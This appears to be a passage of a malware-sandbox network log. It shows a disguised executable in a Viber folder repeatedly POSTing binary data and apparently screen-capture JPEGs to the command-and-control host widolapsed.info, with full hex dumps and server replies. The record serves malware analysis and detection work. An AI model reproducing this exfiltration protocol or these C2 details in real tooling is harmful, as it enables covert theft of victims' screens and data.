                                                                                                      2021-09-15 11:46:51 UTC3162OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76655
                                                                                                      Content-Type: multipart/form-data; boundary=--------1585944860
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:51 UTC3163OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 35 38 35 39 34 34 38 36 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1585944860Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:51 UTC3163OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 8b d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:51 UTC3163OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:51 UTC3179OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:51 UTC3195OUTData Raw: 64 81 8d 38 31 a8 85 3b 35 2d 14 a4 c9 43 9f 5a 70 99 87 46 35 08 34 b5 2e 28 b5 36 5a 5b 99 07 f1 1a 95 6f 1c 75 c1 aa 40 d3 b3 50 e9 c4 d1 55 91 7c 5e 7f 79 41 a5 f3 e1 6f bd 18 aa 19 a5 0c 6a 5d 24 5a aa cb db 6d 1f aa 62 93 ec 76 8d d0 e2 aa 86 34 e0 c6 a7 95 ad 99 4a 71 7b a2 53 a6 46 7e eb d3 1b 4b 6f e1 70 68 0e 7b 13 52 09 9c 7f 11 a2 f3 5d 43 96 9b e8 57 6d 3a 61 d0 66 a3 36 92 af 54 35 7c 5c c8 3a 9a 78 ba 6e e0 1a 3d a4 d0 7b 2a 6c cc 31 30 ea a7 f2 a6 ed 3e 86 b6 05 c2 9e a8 29 77 40 df 79 05 1e d9 f5 41 ec 13 d9 98 f8 3e 95 cd 78 b7 8b 64 1f f4 d3 fa 57 79 e4 db 37 6c 57 13 e3 a4 48 b6 2c 67 82 ff 00 d2 b5 a7 57 99 d8 ce 74 5c 6c cf 3e ae 8f c0 9f f2 1e 6f fa e2 7f f4 25 ae 7a b4 f4 0d 51 74 8b e7 b8 78 8c 9b a3 28 00 38 c1 c8 39 fd 2b 19 ab
                                                                                                      Data Ascii: d81;5-CZpF54.(6Z[ou@PU|^yAoj]$Zmbv4Jq{SF~Koph{R]CWm:af6T5|\:xn={*l10>)w@yA>xdWy7lWH,gWt\l>o%zQtx(89+
                                                                                                      2021-09-15 11:46:51 UTC3211OUTData Raw: 9e 97 b7 ec 99 4b 0c fa b4 8c 9c 53 c4 6e 78 0a 4f e1 5a 27 52 d3 e3 ff 00 57 6a 4f d6 90 eb 81 7f d5 5a c6 3e b4 7b 4a 8f 68 87 b0 a6 b7 91 51 6d 27 6e 91 9f ca ad da 69 b7 1e 68 62 87 ad 46 da ed d1 fb a1 17 e8 29 89 aa de 3c 8b 99 4e 09 ec 2a 64 ab 34 69 4d 50 8c 96 ec b9 e3 35 db 0d a8 3e 95 cb e9 ff 00 f2 11 b7 ff 00 ae 8b 5d 37 8c 49 6b 6b 42 7a 95 ae 67 4f ff 00 90 8d bf fd 74 1f ce 96 1f f8 07 5d 6f e3 1e 85 a8 a5 b9 98 34 d2 85 38 e9 54 8c da 6c 7d 5c 9a ad e2 42 45 ea e0 ff 00 0d 62 f5 ef 58 50 a1 cd 04 db 27 13 8c e4 a8 e2 a2 74 07 53 d3 d3 ee 44 4d 30 eb 91 2f fa bb 71 58 54 56 eb 0b 0e a7 23 c7 d5 e8 6c 36 bf 37 f0 46 a2 a0 7d 66 ed ba 36 3e 95 9d 45 52 c3 d3 5d 0c 9e 2e b3 ea 5b 6d 42 e5 fe f4 ad f9 d3 7c e9 1b ab 93 f8 d5 7a 72 d5 fb 38 ad
                                                                                                      Data Ascii: KSnxOZ'RWjOZ>{JhQm'nihbF)<N*d4iMP5>]7IkkBzgOt]o48Tl}\BEbXP'tSDM0/qXTV#l67F}f6>ER].[mB|zr8
                                                                                                      2021-09-15 11:46:51 UTC3227OUTData Raw: 51 45 00 14 51 45 30 16 8a 4a 28 01 69 29 68 a0 04 a2 8a 28 00 a2 8a 28 01 68 a4 a2 80 16 96 9b 4b 40 85 a4 a2 8a 00 5c d1 49 45 00 2d 14 94 50 02 d1 45 14 00 b4 52 52 d3 10 52 d2 51 4c 02 8a 28 a4 01 45 14 50 01 45 14 50 01 4b 49 45 00 2d 14 94 b4 c0 28 a2 8a 04 2d 14 94 50 02 d1 49 45 00 2d 14 94 50 02 d1 45 14 00 51 45 14 c4 2d 25 14 50 02 d1 45 14 00 51 45 14 00 51 45 14 00 b4 52 0a 5a 62 0a 5a 4a 33 40 0b 45 26 68 a0 05 a3 34 94 50 02 e6 8a 4a 5a 04 14 51 45 00 14 b4 94 b4 c0 29 69 28 a0 05 ef 45 14 50 01 45 25 2d 30 16 8a 4a 28 10 b4 52 52 d0 02 d1 49 45 31 0b 45 14 50 02 d2 51 9a 28 01 68 a2 8a 00 29 69 28 a0 05 a0 52 52 d3 10 b4 66 92 8a 62 17 34 66 92 8a 00 76 68 a6 d2 d1 70 b0 b4 66 93 34 99 a2 e1 61 d9 a3 34 dc d1 45 c2 c3 f3 46 69 b4 66 9d c5
                                                                                                      Data Ascii: QEQE0J(i)h((hK@\IE-PERRRQL(EPEPKIE-(-PIE-PEQE-%PEQEQERZbZJ3@E&h4PJZQE)i(EPE%-0J(RRIE1EPQ(h)i(RRfb4fvhpf4a4EFif
                                                                                                      2021-09-15 11:46:51 UTC3237OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 35 38 35 39 34 34 38 36 30 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1585944860--
                                                                                                      2021-09-15 11:46:52 UTC3237INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:51 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=34dcf45251fe7ac053bd429bbfba9697f5afaa35d044a3b774f14a3b89a76507; expires=Thu, 15-Sep-2022 11:46:51 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:52 UTC3238INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      42192.168.2.34983345.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:52 UTC3238OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76672
                                                                                                      Content-Type: multipart/form-data; boundary=--------1049848244
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:52 UTC3238OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 30 34 39 38 34 38 32 34 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1049848244Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:52 UTC3238OUTData Raw: a5 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 b8 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee c8 9d 11 29 3e 29 21 57 a6 34 36 5a ba 08 71 8b f3 b5 1a b0 78 f8 a8 9a 4d ce ff 58 6d fa 05 ce 4a c5 5f 76 a3 3b b7 29 66 58 7c 2c c9 ac 7c 22 59 25 32 24 45 ef 7b
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[D)>)!W46ZqxMXmJ_v;)fX|,|"Y%2$E{
                                                                                                      2021-09-15 11:46:52 UTC3238OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:52 UTC3254OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:52 UTC3270OUTData Raw: 2a c3 6d 14 32 ee 52 59 5a 47 82 e1 0f 20 30 20 0c a9 04 71 c8 ce 46 38 aa 34 9e 58 dd 9c b7 de dd b7 71 db bb 18 dd 8e 99 c7 19 eb 8e 2b 92 a6 15 4a a7 b4 3d 0a 58 f7 0a 3e ca dd 1f df 7f c8 78 a5 a4 a5 ae a3 cd 16 ac 40 dd 05 56 a9 ad fe f5 44 b6 34 a4 ed 23 5f 56 38 f0 d0 f7 6a e2 5f ad 76 7a cf 1e 1a 4f f7 ab 8b 73 cd 63 85 f8 1f a9 ea 57 f8 d7 a1 de 8e 3c 3b 65 f4 15 47 35 75 b8 f0 fd 88 ff 00 64 7f 2a a3 5c f4 7a fa 9a 62 1f bc bd 05 cd 19 a4 a4 ad 8e 7b 8e cd 28 6a 68 a2 8b 02 63 f2 69 db 8f ad 30 52 d4 b4 5a 6c 90 31 a7 06 35 10 a7 66 a5 a2 94 99 28 73 eb 4e 13 30 e8 c6 a1 06 96 a5 c5 16 a6 cb 4b 73 20 fe 23 52 ad e3 8e b8 35 48 1a 76 6a 1d 38 9a 2a b2 2f 8b cf ef 28 34 be 7c 2d f7 a3 15 43 34 a1 8d 4b a4 8b 55 59 7b 6d a3 f5 4c 52 7d 8e d1 ba 1c
                                                                                                      Data Ascii: *m2RYZG 0 qF84Xq+J=X>x@VD4#_V8j_vzOscW<;eG5ud*\zb{(jhci0RZl15f(sN0Ks #R5Hvj8*/(4|-C4KUY{mLR}
                                                                                                      2021-09-15 11:46:52 UTC3286OUTData Raw: 32 78 a3 15 af f6 4d 36 3f f5 97 40 fd 28 f3 74 88 ff 00 bc f4 bd bf 64 ca 58 67 d5 a4 64 e2 9e 23 73 c0 52 7f 0a d1 3a 96 9f 1f fa bb 52 7e b4 87 5c 0b fe aa d6 31 f5 a3 da 54 7b 44 3d 85 35 bc 8a 8b 69 3b 74 8c fe 55 6e d3 4d b8 f3 43 14 3d 6a 36 d7 6e 8f dd 08 bf 41 4c 4d 56 f1 e4 5c ca 70 4f 61 53 25 59 a3 4a 6a 84 64 b7 65 cf 19 ae d8 6d 41 f4 ae 5f 4f ff 00 90 8d bf fd 74 5a e9 bc 62 4b 5b 5a 13 d4 ad 73 3a 7f fc 84 6d ff 00 eb a0 fe 74 b0 ff 00 c0 3a eb 7f 18 f4 2d 45 2d cc c1 a6 94 29 c7 4a a4 66 d3 63 ea e4 d5 6f 12 12 2f 57 07 f8 6b 17 af 7a c2 85 0e 68 26 d9 38 9c 67 25 47 15 13 a0 3a 9e 9e 9f 72 22 69 87 5c 89 7f d5 db 8a c2 a2 b7 58 58 75 39 1e 3e af 43 61 b5 f9 bf 82 35 15 03 eb 37 6d d1 b1 f4 ac ea 2a 96 1e 9a e8 64 f1 75 9f 52 db 6a 17 2f
                                                                                                      Data Ascii: 2xM6?@(tdXgd#sR:R~\1T{D=5i;tUnMC=j6nALMV\pOaS%YJjdemA_OtZbK[Zs:mt:-E-)Jfco/Wkzh&8g%G:r"i\XXu9>Ca57m*duRj/
                                                                                                      2021-09-15 11:46:52 UTC3302OUTData Raw: 0a 28 a4 a0 05 a2 8a 28 00 a2 8a 28 00 a2 8a 29 80 b4 52 51 40 0b 49 4b 45 00 25 14 51 40 05 14 51 40 0b 45 25 14 00 b4 b4 da 5a 04 2d 25 14 50 02 e6 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 05 a2 92 96 98 82 96 92 8a 60 14 51 45 20 0a 28 a2 80 0a 28 a2 80 0a 5a 4a 28 01 68 a4 a5 a6 01 45 14 50 21 68 a4 a2 80 16 8a 4a 28 01 68 a4 a2 80 16 8a 28 a0 02 8a 28 a6 21 69 28 a2 80 16 8a 28 a0 02 8a 28 a0 02 8a 28 a0 05 a2 90 52 d3 10 52 d2 51 9a 00 5a 29 33 45 00 2d 19 a4 a2 80 17 34 52 52 d0 20 a2 8a 28 00 a5 a4 a5 a6 01 4b 49 45 00 2f 7a 28 a2 80 0a 29 29 69 80 b4 52 51 40 85 a2 92 96 80 16 8a 4a 29 88 5a 28 a2 80 16 92 8c d1 40 0b 45 14 50 01 4b 49 45 00 2d 02 92 96 98 85 a3 34 94 53 10 b9 a3 34 94 50 03 b3 45 36 96 8b 85 85 a3 34 99 a4 cd 17 0b 0e cd 19 a6 e6 8a
                                                                                                      Data Ascii: ((()RQ@IKE%Q@Q@E%Z-%PJ(h(`QE ((ZJ(hEP!hJ(h((!i((((RRQZ)3E-4RR (KIE/z())iRQ@J)Z(@EPKIE-4S4PE64
                                                                                                      2021-09-15 11:46:52 UTC3313OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 30 34 39 38 34 38 32 34 34 2d 2d 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------1049848244--
                                                                                                      2021-09-15 11:46:53 UTC3313INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 15 Sep 2021 11:46:52 GMT
                                                                                                      Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
                                                                                                      X-Powered-By: PHP/5.6.40
                                                                                                      Set-Cookie: X-Csrf-Token=ae99abf3bf0dd74eb25b0666ae5e7ba551751d7a451b075c661bd74524a90ba1; expires=Thu, 15-Sep-2022 11:46:52 GMT; Max-Age=31536000; httponly
                                                                                                      Content-Length: 48
                                                                                                      Connection: close
                                                                                                      Content-Type: application/json; charset=UTF-8
                                                                                                      2021-09-15 11:46:53 UTC3313INData Raw: bb 79 38 30 06 61 52 52 d8 be 36 b1 ce 34 56 e8 c9 52 31 4b be ee 83 84 c0 5c 05 d7 9b 08 fe e0 21 7e 18 eb 76 d9 5d 81 ec cb 00 b3 d5 b4 03 ed
                                                                                                      Data Ascii: y80aRR64VR1K\!~v]


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      43192.168.2.34983445.153.241.148443C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-09-15 11:46:53 UTC3313OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                      Content-Length: 76598
                                                                                                      Content-Type: multipart/form-data; boundary=--------3157952906
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                      Host: widolapsed.info
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-09-15 11:46:53 UTC3314OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 31 35 37 39 35 32 39 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                      Data Ascii: ----------3157952906Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                      2021-09-15 11:46:53 UTC3314OUTData Raw: 7f 92 91 d3 08 69 50 53 d9 bf 13 b1 de 34 5c e8 c9 44 42 2e d0 8b e2 e3 24 1a c2 fa f4 7b d0 89 4f 18 77 eb b7 d9 65 c2 e4 d2 30 f2 ed 9b 03 ed 45 5f a0 e5 4a 09 b7 34 b7 66 02 2c 3f b3 3a 11 4d 32 e9 1b ba 67 c4 9a 41 17 16 5b 44 ee 98 ef 4d 77 7d 78 7d 40 d3 6d 60 3b ea 5f 32 bb b0
                                                                                                      Data Ascii: iPS4\DB.${Owe0E_J4f,?:M2gA[DMw}x}@m`;_2
                                                                                                      2021-09-15 11:46:53 UTC3314OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                      Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                      2021-09-15 11:46:53 UTC3330OUTData Raw: 05 4d 52 0b 5b b4 ba b4 bd 82 49 23 95 81 e2 26 6f e1 51 90 40 eb c5 79 0e bf a5 ff 00 64 6a 8f 6a 1c ba 63 72 16 52 a7 07 d4 1e f5 ec 92 db 2d ad e5 89 86 4b 8f 9e 62 ac 1e e1 dc 11 e5 b9 e8 49 1d 40 af 35 f8 91 ff 00 23 5b ff 00 d7 14 fe 55 70 56 7a 75 26 6e eb 5e 87 27 49 4e c0 a4 c5 6d 63 21 28 a5 c5 18 34 00 77 a2 8e 68 a0 02 8c d1 45 00 14 51 45 00 14 b4 51 4c 41 45 14 50 01 45 14 52 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 b4 00 94 51 45 16 00 a2 96 8a 00 4c 52 d1 45 31 05 14 51 40 05 2d 14 50 01 45 14 50 20 a2 8a 29 80 52 d2 52 d0 01 45 14 50 02 d1 45 14 08 28 a2 8a 00 5a 28 a5 a6 20 a2 8a 29 80 52 d2 52 d0 01 4b 49 4b 4c 41 45 14 50 20 a2 96 8a 60 14 51 4a 28 00 14 51 4b 4c 41 45 14 50 01 4e a4 14 b4 c4 c5 a2 8a 29 a1 0b 45 25 14 c4 2d 2e 69 28 a1 30
                                                                                                      Data Ascii: MR[I#&oQ@ydjjcrR-KbI@5#[UpVzu&n^'INmc!(4whEQEQLAEPER((aEQELRE1Q@-PEP )RREPE(Z( )RRKIKLAEP `QJ(QKLAEPN)E%-.i(0
                                                                                                      2021-09-15 11:46:53 UTC3346OUTData Raw: a6 22 d1 49 4b 40 05 14 51 40 85 a2 92 96 90 05 14 51 40 82 96 92 96 90 05 2d 25 28 a0 42 8a 5a 4a 5a 42 16 ac 40 dd 05 56 a9 ad fe f5 44 b6 34 a4 ed 23 5f 56 38 f0 d0 f7 6a e2 5f ad 76 7a cf 1e 1a 4f f7 ab 8b 73 cd 63 85 f8 1f a9 ea 57 f8 d7 a1 de 8e 3c 3b 65 f4 15 47 35 75 b8 f0 fd 88 ff 00 64 7f 2a a3 5c f4 7a fa 9a 62 1f bc bd 05 cd 19 a4 a4 ad 8e 7b 8e cd 28 6a 68 a2 8b 02 63 f2 69 db 8f ad 30 52 d4 b4 5a 6c 90 31 a7 06 35 10 a7 66 a5 a2 94 99 28 73 eb 4e 13 30 e8 c6 a1 06 96 a5 c5 16 a6 cb 4b 73 20 fe 23 52 ad e3 8e b8 35 48 1a 76 6a 1d 38 9a 2a b2 2f 8b cf ef 28 34 be 7c 2d f7 a3 15 43 34 a1 8d 4b a4 8b 55 59 7b 6d a3 f5 4c 52 7d 8e d1 ba 1c 55 50 c6 9c 18 d4 f2 b5 b3 29 4e 2f 74 4a 74 c8 cf dd 7a 63 69 6d fc 2e 0d 01 cf 62 6a 41 33 8f e2 34 5e 6b
                                                                                                      Data Ascii: "IK@Q@Q@-%(BZJZB@VD4#_V8j_vzOscW<;eG5ud*\zb{(jhci0RZl15f(sN0Ks #R5Hvj8*/(4|-C4KUY{mLR}UP)N/tJtzcim.bjA34^k
